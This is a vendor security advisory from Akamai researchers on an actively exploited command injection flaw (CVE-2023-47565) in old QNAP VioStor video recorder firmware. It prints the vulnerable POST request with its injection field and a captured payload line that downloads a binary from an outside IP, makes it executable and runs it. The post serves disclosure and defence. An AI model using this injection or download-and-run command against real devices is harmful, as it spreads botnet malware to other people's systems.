Need cloud computing? Get started now

Actively Exploited Vulnerability in QNAP VioStor NVR: Fixed, Patches Available

Akamai Wave Blue

Written by

Chad Seaman and Larry Cashdollar

December 14, 2023

Chad Seaman headshot

Written by

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.

Executive summary

Need to know

As part of our InfectedSlurs research, the SIRT uncovered a vulnerability in QNAP VioStor network video recorder (NVR) devices that is being actively exploited in the wild. The NVR device is a high-performance network surveillance solution for network-based monitoring of IP cameras, video recording, playback, and remote data access. The vulnerability has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.

The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.

The following versions of QNAP VioStor NVR firmware are affected:

  • VioStor NVR: Versions 5.0.0 and earlier (5.0.0 released June 21, 2014)

QNAP considers these devices discontinued for support; however, the vendor recommends upgrading VioStor firmware on existing devices to the latest available version. This issue had previously been patched, although it was never publicly reported/disclosed. Furthermore, users should change the default passwords on their devices.

Additionally, US-CERT has issued an advisory.

Exploitation observed

Initially, when we reviewed exploit payloads during the InfectedSlurs campaign, we reported only on two zero-day vulnerabilities as the team was unable to positively link the observed exploit to a given device or manufacturer. This made it difficult to confirm the zero-day classification of the exploit.

After deeper examination of various aspects of the exploit and payload, the SIRT believed the target to be QNAP VioStor NVR devices. These devices fit the targeting profile of the campaign and were shipped with weak default credentials (found in their manuals and observed in the exploit). As is the case with the initial two zero-days, the infected devices could facilitate OS command injection vulnerabilities in NTP settings on the affected Internet of Things (IoT) and NVR devices.

After relaying these theories to the US-CERT, they coordinated with Akamai SIRT and QNAP to review the evidence and help confirm the SIRT’s theories. Ultimately, QNAP confirmed the payloads targeted their VioStor devices — which are retired and no longer supported — but only targeted older versions (5.0.0 or earlier) of their previously released firmware.

The vulnerability is exploited by making a POST to the /cgi-bin/server/server.cgi path. The remote code execution (RCE) exists where the argument for SPECIFIC_SERVER is specified (Figure 1).

  URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Fig. 1: Attempted exploitation of the RCE via command injection

An example of a captured infection payload is shown in Figure 2.

  wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Fig. 2: Captured RCE payload

Basic security practices matter

The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the importance of implementing even stronger long-term, proactive security protocols, such as ensuring consistent updating of systems to shield against potential attacks, and occasionally checking in on the systems/devices, especially if they’re exhibiting odd behavior.

Conclusion

Once again, our custom honeypot network deployment has provided valuable insights into cyberattacks, revealing previously unknown vulnerabilities. The presence of default credentials and outdated, unsupported networked systems has emerged as a route for botnet infections. Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.

This finding emphasizes the critical importance of enhancing awareness and education on best practices for IoT, highlighting associated risks for the average consumer; the need for awareness extends beyond consumers and applies to manufacturers of these devices as well. Longer software support cycles and security upon setup, such as forced password changes, are critical to maintaining system security.

Stay tuned

The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.

The Akamai SIRT would like to thank CISA, US-CERT, and QNAP for their assistance with our communications, coordination, identification, remediation, and disclosure efforts.



Akamai Wave Blue

Written by

Chad Seaman and Larry Cashdollar

December 14, 2023

Chad Seaman headshot

Written by

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Written by

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.